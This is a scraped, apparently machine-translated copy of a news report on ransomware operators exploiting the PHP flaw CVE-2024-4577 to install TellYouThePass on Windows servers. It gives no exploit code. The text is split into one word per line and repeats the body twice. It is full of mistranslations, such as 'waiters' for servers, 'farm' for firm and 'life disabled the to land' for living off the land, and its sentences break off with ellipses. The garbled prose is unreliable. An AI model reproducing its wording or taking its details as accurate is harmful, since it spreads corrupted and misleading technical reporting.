Ransomware attackers are quickly exploiting the PHP vulnerability with a severity rating of 9.8.
Ransomware attackers are quickly exploiting the PHP vulnerability with a severity rating of 9.8.
.
Enlarge
Getty
Pictures
Ransomware
the criminals
to have
quickly
armed
A
easy to operate
vulnerability
In
THE
PHP
programming
language
that
executed
malicious
coded
on
the Web
waiters,
security
researchers
said.
As
of
THURSDAY,
the Internet
analyzes
carried out
by
security
farm
Censys
had
detected
1,000
waiters
infected
by
A
Ransomware
strain
known
as
TellYouThePass,
down
Since
1,800
detected
on
Monday.
THE
waiters,
mostly
located
In
China,
No
longer
display
their
usual
content;
instead,
a lot
list
THE
sites
deposit
phone book,
which
watch
all
files
to have
has been
given
A
.locked
extension,
indicating
they
to have
has been
crypt.
A
accompanying
ransom
note
requests
roughly
$6,500
In
exchange
For
THE
decryption
key.
Enlarge
/
THE
to go out
of
PHP
waiters
infected
by
TellYouThePass
Ransomware.
Censys
Enlarge
/
THE
accompanying
ransom
note.
Censys
When
opportunity
blows
THE
vulnerability,
follow up
as
CVE-2024-4577
And
wearing
A
gravity
rating
of
9.8
out
of
ten,
stems
Since
Errors
In
THE
path
PHP
converts
Unicode
characters
In
ASCII.
A
functionality
built
In
the Windows
known
as
Best
Adjust
allow
attackers
has
to use
A
technical
known
as
argument
injection
has
convert
user-provided
to input
In
characters
that
pass
malicious
orders
has
THE
main
PHP
application.
Exploits
allow
attackers
has
bypasses
CVE-2012-1823,
A
critical
coded
execution
vulnerability
patched
In
PHP
In
2012.
CVE-2024-4577
affected
PHP
only
When
he
short
In
A
fashion
known
as
CGI,
In
which
A
the Web
server
analysis
HTTP
requests
And
pass
them
has
A
PHP
scenario
For
treatment.
Even
When
PHP
is not it
together
has
Computer graphics
fashion,
However,
THE
vulnerability
can
always
be
exploitable
When
PHP
executables
such
as
php.exe
And
php-cgi.exe
are
In
directories
that
are
accessible
by
THE
the Web
server.
This
configuration
East
extremely
rare,
with
THE
exception
of
THE
XAMPP
platform,
which
uses
he
by
default.
A
additional
requirement
appears
has
be
that
THE
the Windows
locale: used
has
personalize
THE
Operating system
has
THE
local
language
of
THE
the user: must
be
together
has
either
Chinese
Or
Japanese.
THE
critical
vulnerability
was
published
on
June
6,
along
with
A
security
patch.
In
24
hours,
threat
actors
were
operator
he
has
install
TellYouThePass,
researchers
Since
security
farm
Imperva
reported
Monday.
THE
Exploits
accomplished
coded
that
used
THE
mshta.exe
the Windows
binary
has
run
A
HTML
application
deposit
hosted
on
A
controlled by the attacker
server.
To use
of
THE
binary
noted
A
approach
known
as
life
disabled
THE
to land,
In
which
attackers
to use
native
Operating system
functional...
Ransomware
the criminals
to have
quickly
armed
A
easy to operate
vulnerability
In
THE
PHP
programming
language
that
executed
malicious
coded
on
the Web
waiters,
security
researchers
said.
As
of
THURSDAY,
the Internet
analyzes
carried out
by
security
farm
Censys
had
detected
1,000
waiters
infected
by
A
Ransomware
strain
known
as
TellYouThePass,
down
Since
1,800
detected
on
Monday.
THE
waiters,
mostly
located
In
China,
No
longer
display
their
usual
content;
instead,
a lot
list
THE
sites
deposit
phone book,
which
watch
all
files
to have
has been
given
A
.locked
extension,
indicating
they
to have
has been
crypt.
A
accompanying
ransom
note
requests
roughly
$6,500
In
exchange
For
THE
decryption
key.
Enlarge
/
THE
to go out
of
PHP
waiters
infected
by
TellYouThePass
Ransomware.
Censys
Enlarge
/
THE
accompanying
ransom
note.
Censys
When
opportunity
blows
THE
vulnerability,
follow up
as
CVE-2024-4577
And
wearing
A
gravity
rating
of
9.8
out
of
ten,
stems
Since
Errors
In
THE
path
PHP
converts
Unicode
characters
In
ASCII.
A
functionality
built
In
the Windows
known
as
Best
Adjust
allow
attackers
has
to use
A
technical
known
as
argument
injection
has
convert
user-provided
to input
In
characters
that
pass
malicious
orders
has
THE
main
PHP
application.
Exploits
allow
attackers
has
bypasses
CVE-2012-1823,
A
critical
coded
execution
vulnerability
patched
In
PHP
In
2012.
CVE-2024-4577
affected
PHP
only
When
he
short
In
A
fashion
known
as
CGI,
In
which
A
the Web
server
analysis
HTTP
requests
And
pass
them
has
A
PHP
scenario
For
treatment.
Even
When
PHP
is not it
together
has
Computer graphics
fashion,
However,
THE
vulnerability
can
always
be
exploitable
When
PHP
executables
such
as
php.exe
And
php-cgi.exe
are
In
directories
that
are
accessible
by
THE
the Web
server.
This
configuration
East
extremely
rare,
with
THE
exception
of
THE
XAMPP
platform,
which
uses
he
by
default.
A
additional
requirement
appears
has
be
that
THE
the Windows
locale: used
has
personalize
THE
Operating system
has
THE
local
language
of
THE
the user: must
be
together
has
either
Chinese
Or
Japanese.
THE
critical
vulnerability
was
published
on
June
6,
along
with
A
security
patch.
In
24
hours,
threat
actors
were
operator
he
has
install
TellYouThePass,
researchers
Since
security
farm
Imperva
reported
Monday.
THE
Exploits
accomplished
coded
that
used
THE
mshta.exe
the Windows
binary
has
run
A
HTML
application
deposit
hosted
on
A
controlled by the attacker
server.
To use
of
THE
binary
noted
A
approach
known
as
life
disabled
THE
to land,
In
which
attackers
to use
native
Operating system
functional...
.
Enlarge
Getty
Pictures
Enlarge
/
THE
to go out
of
PHP
waiters
infected
by
TellYouThePass
Ransomware.
Censys
Enlarge
/
THE
accompanying
ransom
note.
Censys
